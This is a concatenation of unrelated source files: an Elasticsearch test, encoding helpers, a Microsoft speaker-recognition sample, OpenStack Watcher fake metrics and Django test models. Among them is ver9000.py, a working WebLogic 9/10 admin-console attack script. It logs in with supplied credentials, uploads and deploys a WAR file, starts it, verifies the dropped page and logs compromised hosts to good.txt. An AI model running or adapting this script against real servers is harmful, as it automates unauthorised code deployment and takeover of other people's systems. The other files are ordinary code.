        }
        # Recreate the test indexes with a custom mapping to throw
        # parsing errors
        if pytest.config.option.delete_indexes:
            self.es_client.delete_index("events", True)
            self.es_client.delete_index(self.event_index_name, True)
            self.es_client.create_index(self.event_index_name, index_config=mapping)
            self.es_client.create_alias('events', self.event_index_name)
            self.es_client.create_alias('events-previous', self.event_index_name)

    def test_bulk_problems(self):
        event = {
            "utcstamp": "2016-11-08T14:13:01.250631+00:00"
        }
        malformed_event = {
            "utcstamp": "abc",
        }
        self.es_client.save_object(index='events', doc_type='event', body=event, bulk=True)
        self.es_client.save_object(index='events', doc_type='event', body=malformed_event, bulk=True)
        self.refresh(self.event_index_name)
        time.sleep(5)
        # Only the well-formed document should have been indexed.
        assert self.get_num_events() == 1
| gdestuynder/MozDef | tests/mozdef_util/test_elasticsearch_client.py | Python | mpl-2.0 | 19,095 |
import codecs
import re
# NOTE(review): despite the name, \xFE\xFF / \xFF\xFE are the UTF-16 BOMs
# (the UTF-8 BOM is \xEF\xBB\xBF), and the pattern string is itself encoded
# to UTF-8 before compiling -- confirm which BOM this is meant to strip.
UTF8_BOM_PATTERN = re.compile("\\A(\\xFE\\xFF|\\xFF\\xFE)".encode('utf-8'))
def read_unicode(filename,external_encoding='utf8'):
    """Read *filename* decoded with *external_encoding*, strip a leading BOM
    matched by UTF8_BOM_PATTERN, and return the content re-encoded as UTF-8
    bytes.  Python 2 only (uses the ``unicode`` builtin).

    NOTE(review): the codecs file handle is never closed explicitly, and the
    BOM pattern appears to target UTF-16 BOMs -- verify intent.
    """
    data = codecs.open(filename,encoding=external_encoding).read()
    if UTF8_BOM_PATTERN.match(data):
        # Drop the BOM, then encode the remaining text back to UTF-8 bytes.
        return unicode(UTF8_BOM_PATTERN.sub('',data)).encode('utf8')
    else:
        return unicode(data).encode('utf8')
def unique_list(seq):
    """Return the items of *seq* with duplicates removed, preserving the
    order of each item's first occurrence."""
    seen = set()
    ordered = []
    for item in seq:
        if item not in seen:
            seen.add(item)
            ordered.append(item)
    return ordered
""" Copyright (c) Microsoft. All rights reserved.
Licensed under the MIT license.
Microsoft Cognitive Services (formerly Project Oxford): https://www.microsoft.com/cognitive-services
Microsoft Cognitive Services (formerly Project Oxford) GitHub:
https://github.com/Microsoft/ProjectOxford-ClientSDK
Copyright (c) Microsoft Corporation
All rights reserved.
MIT License:
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import IdentificationServiceHttpClientHelper
import sys
def print_all_profiles(subscription_key):
    """Print all the profiles for the given subscription key.

    Arguments:
    subscription_key -- the subscription key string
    """
    helper = IdentificationServiceHttpClientHelper.IdentificationServiceHttpClientHelper(
        subscription_key)
    profiles = helper.get_all_profiles()
    # Header row, then one comma-separated line per profile.
    print('Profile ID, Locale, Enrollment Speech Time, Remaining Enrollment Speech Time,'
          ' Created Date Time, Last Action Date Time, Enrollment Status')
    for profile in profiles:
        fields = (profile.get_profile_id(),
                  profile.get_locale(),
                  profile.get_enrollment_speech_time(),
                  profile.get_remaining_enrollment_time(),
                  profile.get_created_date_time(),
                  profile.get_last_action_date_time(),
                  profile.get_enrollment_status())
        print(', '.join('{0}'.format(field) for field in fields))
if __name__ == "__main__":
    # Exactly one argument is required: the Cognitive Services subscription key.
    if len(sys.argv) < 2:
        print('Usage: python PrintAllProfiles.py <subscription_key>')
        print('\t<subscription_key> is the subscription key for the service')
        sys.exit('Error: Incorrect Usage.')
    print_all_profiles(sys.argv[1])
| Microsoft/ProjectOxford-ClientSDK | SpeakerRecognition/Python/Identification/PrintAllProfiles.py | Python | mit | 2,648 |
def f(x):
    """Return x incremented by one (the function mapped over the list)."""
    # A def is preferred over binding a lambda to a name (PEP 8, E731).
    return x + 1


# list() forces evaluation: under Python 3 map() is lazy, so a bare
# map(f, ...) statement would never actually call f.
result = list(map(f, [1, 2, 3, 4]))  # [2, 3, 4, 5]
#coding=utf-8
import re
import urllib
import requests
import Queue
import time
from bs4 import BeautifulSoup
class ver9000():
    """WebLogic 9/10 admin-console attack helper (Python 2).

    Workflow: grab a console session cookie, log in, scrape the server and
    domain names, upload a .war through the install portlet, deploy and
    start it, then request the dropped page to verify. Results are appended
    to good.txt / bad.txt, failures to error.txt. Every network step is
    wrapped in the same retry loop (up to `count` attempts).
    """
    def get_cookie(self,url,headers,count):
        """Fetch the login form and store the ADMINCONSOLESESSION cookie on self.cookies."""
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    login_data=requests.get(url+'/login/LoginForm.jsp',timeout=10)
                    cookie_buff=login_data.headers['Set-Cookie']
                    cookie_search=re.search(r'([A-za-z0-9]{5,}[!-]+[0-9]*)+',cookie_buff)
                    cookie=cookie_search.group()
                    self.cookies=dict(ADMINCONSOLESESSION=cookie,path='/')
                    print 'Cookie:%s'%cookie
                    return True
                # NOTE(review): bare except; failures are only written to
                # error.txt when ctest == 3 even if `count` differs.
                except:
                    print 'Get cookie Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('Get cookie Error! '+url+'\n')
                        f.close()
    def do_login(self,url,usr,pwd,headers,count):
        """POST the credentials through j_security_check using the saved cookie."""
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    data = {'j_username':usr,'j_password':pwd}
                    login_data=requests.post(url+'/j_security_check',data =data,headers=headers,cookies=self.cookies,timeout=10)
                    # A successful login redirects into console.portal pages.
                    if login_data.content.count('console.portal') !=0:
                        print "\r\nLogin Successful!\r\n"
                        return True
                    else:
                        print "\r\nLogin Failed!\r\n"
                        f=open('bad.txt', 'a')
                        f.write('Login Failed: '+url+'\tWebLogic Server 10.x\n')
                        f.close()
                        return False
                except:
                    print 'Login Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('Login Error! '+url+'\n')
                        f.close()
    def get_server_name(self,url,headers,count):
        """Scrape the managed server name from the console server table page."""
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    server_data=requests.get(url+'/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage',headers=headers,cookies=self.cookies,timeout=10)
                    server_soup=BeautifulSoup(server_data.text)
                    # Look for a link whose URL-decoded href embeds
                    # ":Name=<server>,Type=Server".
                    for name in server_soup.find_all('a'):
                        if name.get('href') != None:
                            name=re.search(r'\:Name=[\w]*\,Type\=Server',urllib.unquote(name.get('href')))
                            if name :
                                self.server_name=name.group()
                                break
                    self.server_name=re.search(r'Name=[a-zA-Z0-9]*',self.server_name)
                    self.server_name=self.server_name.group()[5:]
                    print 'ServerName:%s\r\n' %self.server_name
                    return True
                except:
                    print 'get_server_name Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('get_server_name Error! '+url+'\n')
                        f.close()
    def get_domain_name(self,url,headers,count):
        """Scrape the domain name from the console server table page."""
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    domain_data=requests.get(url+'/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage',headers=headers,cookies=self.cookies,timeout=10)
                    domain_soup=BeautifulSoup(domain_data.text)
                    # Same link-scan as get_server_name, but matching Type=Domain.
                    for name in domain_soup.find_all('a'):
                        if name.get('href') != None:
                            name=re.search(r'\:Name=[\w]*\,Type\=Domain',urllib.unquote(name.get('href')))
                            if name :
                                self.domain_name=name.group()
                                break
                    self.domain_name=re.search(r'Name=[\w]*',self.domain_name)
                    self.domain_name=self.domain_name.group()[5:]
                    print 'DomainName:%s\r\n' %self.domain_name
                    return True
                except:
                    print 'get_domain_name Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('get_domain_name Error! '+url+'\n')
                        f.close()
    def get_path(self,url,headers,warname,count):
        """Extract the server-side upload path and OS type from the upload response.

        Sets self.path and self.system (1 = Windows, 2 = Linux) by matching
        drive-letter vs. slash-rooted paths around `warname` in
        self.path_data (set by uploader()).
        """
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    path_exp=warname+' [^ -~]*[ -~]*'
                    path_sea=re.search(path_exp,self.path_data.text)
                    if path_sea:
                        path=re.search(r'[a-zA-Z]:(\\[\w .]+)+',path_sea.group()) #Windows
                        if path:
                            self.path=path.group()
                            self.system=1
                            print 'Target system: Windows\n'
                        else:
                            path=re.search(r'(/[\w .]+)+',path_sea.group()) #Linux
                            if path:
                                self.path=path.group()
                                self.system=2
                                print 'Target system: Linux\n'
                    time.sleep(1)
                    print 'Upload Path:%s\n' %self.path
                    return True
                except:
                    print 'get_path Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('get_path Error! '+url+'\n')
                        f.close()
    def uploader(self,url,warname,headers,count):
        """Upload the local .war file through the console install portlet.

        Stores the response on self.path_data for get_path() to parse.
        """
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    upload_file = {'AppApplicationInstallPortletuploadAppPath': (warname, open(warname, 'rb'), 'application/octet-stream')}
                    upload_url=url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/uploadApp'
                    print 'Uploading...',
                    self.path_data=requests.post(upload_url,cookies=self.cookies,headers=headers,files=upload_file,timeout=20)
                    print 'OK!\n'
                    return True
                except:
                    print 'upload Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('upload Error! '+url+'\n')
                        f.close()
    def unlock(self,url,headers,count):
        """Trigger the change-center MakeChangesAction (acquire the edit lock)."""
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    unlock_data={'ChangeManagerPortlet_actionOverride':'/MakeChangesAction',
                    'changeCenter':'ChangeCenterClicked',
                    '_nfpb':'true',
                    '_pageLabel':'HomeReserved'
                    }
                    requests.post(url+'/console.portal',data=unlock_data,headers=headers,cookies=self.cookies,timeout=10)
                    print 'Unlock OK!\n'
                    return True
                except:
                    print 'Unlock Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('Unlock Error! '+url+'\n')
                        f.close()
    def active(self,url,headers,count):
        """Activate pending changes in the console change center."""
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    active_data={'ChangeManagerPortlet_actionOverride':'/ActivateChangesAction',
                    'changeCenter':'ChangeCenterClicked',
                    '_nfpb':'true',
                    '_pageLabel':'HomeReserved'
                    }
                    requests.post(url+'/console.portal',data=active_data,headers=headers,cookies=self.cookies,timeout=10)
                    print 'Active OK!\n'
                    return True
                except:
                    print 'Active Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('Active Error! '+url+'\n')
                        f.close()
    def start_instance(self,url,headers,depolyname,count):
        """Start the deployed application instance via a two-stage POST."""
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    start_data1={
                    'AppGlobalStartPortletchosenContents':'com.bea.console.handles.AppDeploymentHandle("com.bea:Name='+depolyname+',Type=AppDeployment")',
                    '_pageLabel':'AppGlobalStartPage',
                    '_nfpb':'true'
                    }
                    start_data2={'AppGlobalStartPortlet_actionOverride':'/com/bea/console/actions/app/globalstart/finish'}
                    print 'Starting instance...\n'
                    print 'Stage one....',
                    # Stage one selects the deployment (keyed by domain name).
                    requests.post(url+'/console.portal?AppGlobalStartPortletreturnTo=AppDeploymentsControlPage&AppDeploymentsControlPortlethandle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3D'+self.domain_name+'%2CType%3DDomain%22%29',data=start_data1,headers=headers,cookies=self.cookies)
                    print 'OK!\tStage two....',
                    # Stage two confirms the global-start wizard.
                    requests.post(url+'/console.portal',data=start_data2,headers=headers,cookies=self.cookies)
                    print 'OK!\n'
                    print '%s Started!\n' %depolyname
                    return True
                except:
                    print 'Start Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('Start Error! '+url+'\n')
                        f.close()
    def depoly(self,url,warname,depolyname,headers,count):
        """Register the uploaded .war as an application deployment.

        Uses self.path / self.system from get_path() to build an OS-specific
        (backslash vs. slash) source path, then drives the three install
        wizard steps.
        """
        ctest=0
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                try:
                    if self.system == 1:
                        depoly_data1={'AppApplicationInstallPortletselectedAppPath': self.path+'\\'+warname}
                        depoly_data2={'AppApplicationInstallPortlettargetStyle': 'Application'}
                        depoly_data3={
                        'AppApplicationInstallPortletname': depolyname,
                        'AppApplicationInstallPortletsecurityModel': 'DDOnly',
                        'AppApplicationInstallPortletstagingStyle': 'Default',
                        'AppApplicationInstallPortletnoStageSourcePath': self.path+'\\'+warname
                        }
                    else:
                        depoly_data1={'AppApplicationInstallPortletselectedAppPath': self.path+'/'+warname}
                        depoly_data2={'AppApplicationInstallPortlettargetStyle': 'Application'}
                        depoly_data3={
                        'AppApplicationInstallPortletname': depolyname,
                        'AppApplicationInstallPortletsecurityModel': 'DDOnly',
                        'AppApplicationInstallPortletstagingStyle': 'Default',
                        'AppApplicationInstallPortletnoStageSourcePath': self.path+'/'+warname
                        }
                    print 'Depolying....',
                    requests.post(url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/appSelected',cookies=self.cookies,headers=headers,data=depoly_data1,timeout=20)
                    requests.post(url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/targetStyleSelected',cookies=self.cookies,headers=headers,data=depoly_data2,timeout=20)
                    requests.post(url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/finish',cookies=self.cookies,headers=headers,data=depoly_data3,timeout=20)
                    print 'OK!\n'
                    return True
                except:
                    print 'depoly Error!\n'
                    if ctest == 3:
                        f=open('error.txt', 'a')
                        f.write('depoly Error! '+url+'\n')
                        f.close()
    def test(self,url,depolyname,testpage,count):
        """Request the deployed test page and log the result.

        Writes a tab-padded line (t/t2 are tab strings chosen from the
        domain-name/URL lengths to keep columns aligned) to good.txt on
        HTTP 200, otherwise to bad.txt.
        """
        ctest=0
        if len(self.domain_name) < 8:
            t='\t\t\t'
        elif len(self.domain_name) > 15:
            t='\t'
        else:
            t='\t\t'
        while True:
            if ctest == count:
                return False
            else:
                if ctest != 0:
                    ctest+=1
                    print "Retry %s times" %ctest
                else:
                    ctest+=1
                test_url=url.split('/console')[0]+'/'+depolyname+'/'+testpage
                test_data=requests.get(test_url)
                if len(test_url) < 40:
                    t2='\t\t'
                else:
                    t2='\t'
                if test_data.status_code == 200:
                    print 'Test OK!\t'+test_url+'\n'
                    f=open('good.txt', 'a')
                    if self.system == 1:
                        f.write(test_url+t2+'WebLogic 9\t\t'+self.domain_name+t+'Windows\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
                        f.close()
                        return
                    else:
                        f.write(test_url+t2+'WebLogic 9\t\t'+self.domain_name+t+'Linux\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
                        f.close()
                        return
                else:
                    print 'Test Failed!'
                    f=open('bad.txt', 'a')
                    if self.system == 1:
                        f.write('Test Failed:'+test_url+t2+'WebLogic 9\t\t'+self.domain_name+t+'Windows\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
                        f.close()
                        return
                    else:
                        f.write('Test Failed:'+test_url+t2+'WebLogic 9\t'+self.domain_name+t+'Linux\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
                        f.close()
                        return
| dc3l1ne/Weblogic_Automatical_Attacker | ver9000.py | Python | gpl-2.0 | 11,387 |
# -*- encoding: utf-8 -*-
# Copyright (c) 2015 b<>com
#
# Authors: Jean-Emile DARTOIS <jean-emile.dartois@b-com.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import oslo_utils
class FakeCeilometerMetrics(object):
    """In-memory stand-in for the Ceilometer data source used in tests.

    The mock_get_statistics* methods mimic the data-source API and route
    each meter name (or period, for the noisy-neighbor variant) to one of
    the canned per-resource value tables defined as static methods below.
    Resources are keyed by their ``uuid`` attribute.
    """
    NAME = 'ceilometer'
    def __init__(self):
        # Name of a metric to treat as empty; set via empty_one_metric().
        self.emptytype = ""
    def empty_one_metric(self, emptytype):
        self.emptytype = emptytype
    def mock_get_statistics(self, resource=None, resource_type=None,
                            meter_name=None, period=None, aggregate='mean',
                            granularity=None):
        # Dispatch the requested meter to the matching canned table;
        # unknown meters fall through and return 0.
        result = 0
        if meter_name == 'host_cpu_usage':
            result = self.get_usage_compute_node_cpu(resource)
        elif meter_name == 'host_ram_usage':
            result = self.get_usage_compute_node_ram(resource)
        elif meter_name == 'host_outlet_temp':
            result = self.get_average_outlet_temp(resource)
        elif meter_name == 'host_inlet_temp':
            result = self.get_average_inlet_temp(resource)
        elif meter_name == 'host_airflow':
            result = self.get_average_airflow(resource)
        elif meter_name == 'host_power':
            result = self.get_average_power(resource)
        elif meter_name == 'instance_cpu_usage':
            result = self.get_average_usage_instance_cpu(resource)
        elif meter_name == 'instance_ram_usage':
            result = self.get_average_usage_instance_memory(resource)
        return result
    def mock_get_statistics_nn(self, resource=None, meter_name=None,
                               period=None, aggregate='mean', granularity=300):
        """Statistics for noisy neighbor strategy
        Signature should match DataSourceBase.get_instance_l3_cache_usage
        """
        # Period doubles as a selector: 100 -> "current" sample,
        # 200 -> "previous" sample.
        result = 0.0
        if period == 100:
            result = self.get_average_l3_cache_current(resource)
        if period == 200:
            result = self.get_average_l3_cache_previous(resource)
        return result
    def mock_get_statistics_wb(self, resource=None, resource_type=None,
                               meter_name=None, period=None, aggregate='mean',
                               granularity=None):
        """Statistics for workload balance strategy"""
        result = 0.0
        if meter_name == 'instance_cpu_usage':
            result = self.get_average_usage_instance_cpu_wb(resource)
        elif meter_name == 'instance_ram_usage':
            result = self.get_average_usage_instance_memory_wb(resource)
        return result
    @staticmethod
    def get_average_l3_cache_current(resource):
        """The average l3 cache used by instance"""
        uuid = resource.uuid
        mock = {}
        mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 35 * oslo_utils.units.Ki
        mock['cae81432-1631-4d4e-b29c-6f3acdcde906'] = 30 * oslo_utils.units.Ki
        mock['INSTANCE_3'] = 40 * oslo_utils.units.Ki
        mock['INSTANCE_4'] = 35 * oslo_utils.units.Ki
        return mock[str(uuid)]
    @staticmethod
    def get_average_l3_cache_previous(resource):
        """The average l3 cache used by instance"""
        uuid = resource.uuid
        mock = {}
        mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 34.5 * (
            oslo_utils.units.Ki)
        mock['cae81432-1631-4d4e-b29c-6f3acdcde906'] = 30.5 * (
            oslo_utils.units.Ki)
        mock['INSTANCE_3'] = 60 * oslo_utils.units.Ki
        mock['INSTANCE_4'] = 22.5 * oslo_utils.units.Ki
        return mock[str(uuid)]
    @staticmethod
    def get_average_outlet_temp(resource):
        """The average outlet temperature for host"""
        uuid = resource.uuid
        mock = {}
        mock["fa69c544-906b-4a6a-a9c6-c1f7a8078c73"] = 30
        # use a big value to make sure it exceeds threshold
        mock["af69c544-906b-4a6a-a9c6-c1f7a8078c73"] = 100
        if uuid not in mock.keys():
            mock[uuid] = 100
        return float(mock[str(uuid)])
    @staticmethod
    def get_usage_compute_node_ram(resource):
        uuid = resource.uuid
        mock = {}
        # Ceilometer returns hardware.memory.used samples in KB.
        mock['Node_0'] = 7 * oslo_utils.units.Ki
        mock['Node_1'] = 5 * oslo_utils.units.Ki
        mock['Node_2'] = 29 * oslo_utils.units.Ki
        mock['Node_3'] = 8 * oslo_utils.units.Ki
        mock['Node_4'] = 4 * oslo_utils.units.Ki
        if uuid not in mock.keys():
            # mock[uuid] = random.randint(1, 4)
            mock[uuid] = 8
        return float(mock[str(uuid)])
    @staticmethod
    def get_average_airflow(resource):
        """The average outlet temperature for host"""
        uuid = resource.uuid
        mock = {}
        mock['Node_0'] = 400
        # use a big value to make sure it exceeds threshold
        mock['Node_1'] = 100
        if uuid not in mock.keys():
            mock[uuid] = 200
        return mock[str(uuid)]
    @staticmethod
    def get_average_inlet_temp(resource):
        """The average outlet temperature for host"""
        uuid = resource.uuid
        mock = {}
        mock['Node_0'] = 24
        mock['Node_1'] = 26
        if uuid not in mock.keys():
            mock[uuid] = 28
        return mock[str(uuid)]
    @staticmethod
    def get_average_power(resource):
        """The average outlet temperature for host"""
        uuid = resource.uuid
        mock = {}
        mock['Node_0'] = 260
        mock['Node_1'] = 240
        if uuid not in mock.keys():
            mock[uuid] = 200
        return mock[str(uuid)]
    @staticmethod
    def get_usage_compute_node_cpu(*args, **kwargs):
        """The last VM CPU usage values to average
        :param uuid:00
        :return:
        """
        resource = args[0]
        # Keys combine uuid and hostname: "<uuid>_<hostname>".
        uuid = "%s_%s" % (resource.uuid, resource.hostname)
        measurements = {}
        # node 0
        measurements['Node_0_hostname_0'] = 7
        measurements['Node_1_hostname_1'] = 7
        measurements['fa69c544-906b-4a6a-a9c6-c1f7a8078c73_hostname_0'] = 7
        measurements['af69c544-906b-4a6a-a9c6-c1f7a8078c73_hostname_1'] = 7
        # node 1
        measurements['Node_2_hostname_2'] = 80
        # node 2
        measurements['Node_3_hostname_3'] = 5
        measurements['Node_4_hostname_4'] = 5
        measurements['Node_5_hostname_5'] = 10
        # node 3
        measurements['Node_6_hostname_6'] = 8
        # This node doesn't send metrics
        measurements['LOST_NODE_hostname_7'] = None
        measurements['Node_19_hostname_19'] = 10
        # node 4
        measurements['INSTANCE_7_hostname_7'] = 4
        result = measurements[uuid]
        # None propagates as-is to model the "no samples" case.
        return float(result) if result is not None else None
    @staticmethod
    def get_average_usage_instance_cpu_wb(resource):
        """The last VM CPU usage values to average
        :param resource:
        :return:
        """
        uuid = resource.uuid
        mock = {}
        # node 0
        mock['INSTANCE_1'] = 80
        mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 50
        # node 1
        mock['INSTANCE_3'] = 20
        mock['INSTANCE_4'] = 10
        return float(mock[str(uuid)])
    @staticmethod
    def get_average_usage_instance_memory_wb(resource):
        uuid = resource.uuid
        mock = {}
        # node 0
        mock['INSTANCE_1'] = 30
        mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 12
        # node 1
        mock['INSTANCE_3'] = 12
        mock['INSTANCE_4'] = 12
        return mock[str(uuid)]
    @staticmethod
    def get_average_usage_instance_cpu(*args, **kwargs):
        """The last VM CPU usage values to average
        :param uuid:00
        :return:
        """
        resource = args[0]
        uuid = resource.uuid
        mock = {}
        # node 0
        mock['INSTANCE_0'] = 7
        mock['INSTANCE_1'] = 7
        # node 1
        mock['INSTANCE_2'] = 10
        # node 2
        mock['INSTANCE_3'] = 5
        mock['INSTANCE_4'] = 5
        mock['INSTANCE_5'] = 10
        # node 3
        mock['INSTANCE_6'] = 8
        # node 4
        mock['INSTANCE_7'] = 4
        mock['LOST_INSTANCE'] = None
        # metrics might be missing in scenarios which do not do computations
        if uuid not in mock.keys():
            mock[uuid] = 0
        return mock[str(uuid)]
    @staticmethod
    def get_average_usage_instance_memory(resource):
        uuid = resource.uuid
        mock = {}
        # node 0
        mock['INSTANCE_0'] = 2
        mock['INSTANCE_1'] = 5
        # node 1
        mock['INSTANCE_2'] = 5
        # node 2
        mock['INSTANCE_3'] = 8
        mock['INSTANCE_4'] = 5
        mock['INSTANCE_5'] = 16
        # node 3
        mock['INSTANCE_6'] = 8
        # node 4
        mock['INSTANCE_7'] = 4
        return mock[str(uuid)]
    @staticmethod
    def get_average_usage_instance_disk(resource):
        uuid = resource.uuid
        mock = {}
        # node 0
        mock['INSTANCE_0'] = 2
        mock['INSTANCE_1'] = 2
        # node 1
        mock['INSTANCE_2'] = 2
        # node 2
        mock['INSTANCE_3'] = 10
        mock['INSTANCE_4'] = 15
        mock['INSTANCE_5'] = 20
        # node 3
        mock['INSTANCE_6'] = 8
        # node 4
        mock['INSTANCE_7'] = 4
        return mock[str(uuid)]
| openstack/watcher | watcher/tests/decision_engine/model/ceilometer_metrics.py | Python | apache-2.0 | 9,723 |
"""
Various complex queries that have been problematic in the past.
"""
from __future__ import unicode_literals
import threading
from django.db import models
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
class DumbCategory(models.Model):
pass
class ProxyCategory(DumbCategory):
class Meta:
proxy = True
@python_2_unicode_compatible
class NamedCategory(DumbCategory):
name = models.CharField(max_length=10)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Tag(models.Model):
name = models.CharField(max_length=10)
parent = models.ForeignKey('self', blank=True, null=True,
related_name='children')
category = models.ForeignKey(NamedCategory, null=True, default=None)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Note(models.Model):
    """Test model whose instances carry an unpicklable attribute (a lock)."""
    note = models.CharField(max_length=100)
    misc = models.CharField(max_length=10)
    class Meta:
        ordering = ['note']
    def __str__(self):
        return self.note
    def __init__(self, *args, **kwargs):
        super(Note, self).__init__(*args, **kwargs)
        # Regression for #13227 -- having an attribute that
        # is unpickleable doesn't stop you from cloning queries
        # that use objects of that type as an argument.
        self.lock = threading.Lock()
@python_2_unicode_compatible
class Annotation(models.Model):
name = models.CharField(max_length=10)
tag = models.ForeignKey(Tag)
notes = models.ManyToManyField(Note)
def __str__(self):
return self.name
@python_2_unicode_compatible
class ExtraInfo(models.Model):
info = models.CharField(max_length=100)
note = models.ForeignKey(Note)
value = models.IntegerField(null=True)
class Meta:
ordering = ['info']
def __str__(self):
return self.info
@python_2_unicode_compatible
class Author(models.Model):
name = models.CharField(max_length=10)
num = models.IntegerField(unique=True)
extra = models.ForeignKey(ExtraInfo)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Item(models.Model):
name = models.CharField(max_length=10)
created = models.DateTimeField()
modified = models.DateTimeField(blank=True, null=True)
tags = models.ManyToManyField(Tag, blank=True)
creator = models.ForeignKey(Author)
note = models.ForeignKey(Note)
class Meta:
ordering = ['-note', 'name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Report(models.Model):
name = models.CharField(max_length=10)
creator = models.ForeignKey(Author, to_field='num', null=True)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Ranking(models.Model):
rank = models.IntegerField()
author = models.ForeignKey(Author)
class Meta:
# A complex ordering specification. Should stress the system a bit.
ordering = ('author__extra__note', 'author__name', 'rank')
def __str__(self):
return '%d: %s' % (self.rank, self.author.name)
@python_2_unicode_compatible
class Cover(models.Model):
title = models.CharField(max_length=50)
item = models.ForeignKey(Item)
class Meta:
ordering = ['item']
def __str__(self):
return self.title
@python_2_unicode_compatible
class Number(models.Model):
num = models.IntegerField()
def __str__(self):
return six.text_type(self.num)
# Symmetrical m2m field with a normal field using the reverse accessor name
# ("valid").
class Valid(models.Model):
valid = models.CharField(max_length=10)
parent = models.ManyToManyField('self')
class Meta:
ordering = ['valid']
# Some funky cross-linked models for testing a couple of infinite recursion
# cases.
class X(models.Model):
y = models.ForeignKey('Y')
class Y(models.Model):
x1 = models.ForeignKey(X, related_name='y1')
# Some models with a cycle in the default ordering. This would be bad if we
# didn't catch the infinite loop.
class LoopX(models.Model):
y = models.ForeignKey('LoopY')
class Meta:
ordering = ['y']
class LoopY(models.Model):
x = models.ForeignKey(LoopX)
class Meta:
ordering = ['x']
class LoopZ(models.Model):
z = models.ForeignKey('self')
class Meta:
ordering = ['z']
# A model and custom default manager combination.
class CustomManager(models.Manager):
    def get_queryset(self):
        # Restrict the default queryset: only public rows tagged 't1'.
        qs = super(CustomManager, self).get_queryset()
        return qs.filter(public=True, tag__name='t1')
@python_2_unicode_compatible
class ManagedModel(models.Model):
data = models.CharField(max_length=10)
tag = models.ForeignKey(Tag)
public = models.BooleanField(default=True)
objects = CustomManager()
normal_manager = models.Manager()
def __str__(self):
return self.data
